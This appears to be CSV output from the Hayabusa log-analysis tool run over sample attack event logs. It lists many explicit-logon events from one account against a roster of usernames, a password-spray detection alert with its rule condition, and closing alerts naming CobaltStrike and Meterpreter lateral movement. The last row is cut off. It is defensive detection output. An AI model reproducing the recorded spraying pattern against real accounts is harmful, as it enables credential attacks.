Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:03.525 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:edygert/jlake/drook/mdouglas/cspizor/cragoso/baker/ssims/jorchilles/bking/smisenar/dmashburn/bgreenwood/bgalbraith IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- -2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,Suspicious PowerShell Invocations - 